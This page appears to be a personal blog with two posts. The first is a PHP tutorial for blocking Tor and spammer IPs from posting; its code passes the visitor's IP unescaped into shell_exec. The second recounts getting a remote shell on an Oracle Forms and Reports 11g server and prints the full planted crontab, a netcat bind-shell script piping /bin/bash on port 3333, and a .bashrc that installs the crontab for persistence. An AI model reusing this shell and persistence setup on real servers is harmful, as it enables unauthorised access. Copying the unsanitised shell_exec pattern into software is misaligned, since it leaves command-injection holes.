Blocking POST To Your PHP Site

This article has been re-written from a previous site I owned to include blocking forum spammers.

This article shows how to block TOR Exit nodes as well as known forum spammers from being able to post to your PHP site. This is much easier and quicker as well as lower resource intensive than using firewall rules or APIs.

For those that would like to allow TOR users or forum spammers to visit their PHP-enabled site but not allow them to post. This will also greatly reduce the number of spammers who join your site if you edit the appropriate registration php file.

You can setup a cron job to download the following two files and place them in the root directory of your server. Or, in the appropriate directory your post .php file is located.

The Welcome.php file below contains the code needed to grep through the TOR node files to see if the current user’s IP address is listed. If it is listed, the script will exit and tell them they are not allowed to post. If their IP address is not listed, their post will be successful.

Tor Nodes
http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv
http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv

Tor Cron (recommend daily)
curl http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv > /yourwebdirectory/Tor_ip_list_ALL.csv
curl http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv > /yourwebdirectory/Tor_ip_list_EXIT.csv

Known forum spammers
http://www.stopforumspam.com/downloads/listed_ip_7_all.zip

Known forum spammers cron job (recommend daily)
curl http://www.stopforumspam.com/downloads/listed_ip_7_all.zip > /yourwebdirectory/listed_ip_7_all.zip|unzip -o /yourwebdirectory/|unzip listed_ip_7_all.zip > /yourwebdirectory/listed_ip_7_all.txt|mv /yourwebdirectory/listed_ip_7_all.txt /yourwebdirectory/listed_ip_7_all.csv

Use at your own risk and please make backup files of anything you are about to change.

Index.php

<strong>Index.php</strong>

<form action=”welcome.php” method=”post”>
Name: <input type=”text” name=”name”><br>
E-mail: <input type=”text” name=”email”><br>
<input type=”submit”>
</form>
</body>
</html>

Welcome.php

<html>
<body>
<?php</pre>
$ip = $_SERVER['REMOTE_ADDR'];</pre>
$checktor = shell_exec(” grep $ip *.csv”);
if ($checktor > “”)
{
echo “You are using TOR or a known SPAMMER IP. You are not allowed to post here”;
$logip = shell_exec(“echo $ip tried to post a comment >> evil.log”);
exit;
}
?>
</body>
</html>

Suggestions or feedback is always appreciated in the comment section.

Getting a remote shell on Oracle Forms and Reports 11g

UPDATE: There are actually two CVE-VULNERABILITIES here. CVE-2012-1734 which was discovered using my vulnerability that allows planting of files. Credit goes to  the University of Texas at Austin Information Security Office.

Earlier I laid down for a nap (which I call pillow hugging) and my mind was racing. I was thinking about Oracle Reports and what other way I could exploit the vulnerability (CVE-2012-3152) which I discovered back in 2011. Gaining a remote shell was what I was thinking about so I jumped out of bed, grabbed a cup of coffee and lit a cigarette up and went to work.

I spent the entire day on this project partly because I found Oracle Linux’s version of netcat to not include the -e option which allows you to pipe a program into it such as /bin/sh. I did some research and found a way to make it work.

At this time, I am not publishing the exploit vector.

I planted 3 files on the server

  1. A crontab file
  2. My shell script to run netcat and pipe /bin/sh into it
  3. .bashrc in /home/oracle

 Crontab File

*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1

Netcat Shell Script

#!/bin/sh
myvar=`echo $RANDOM`
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
then
echo “shell already started”
else
sh $mycommand &
fi

.bashrc

# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# User specific aliases and functions
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab
This was the best way I could come up with to get it to run and have it setup where it would continue to run no matter if the user logged out or not. Once someone logged into the oracle account, the server was pwn3d. You could easily get someone to the console really fast by stopping a service or two. :-)
I think they underestimated the danger of this vulnerability. Their approach to “fixing” it was inadequate at best. Enjoy the demo!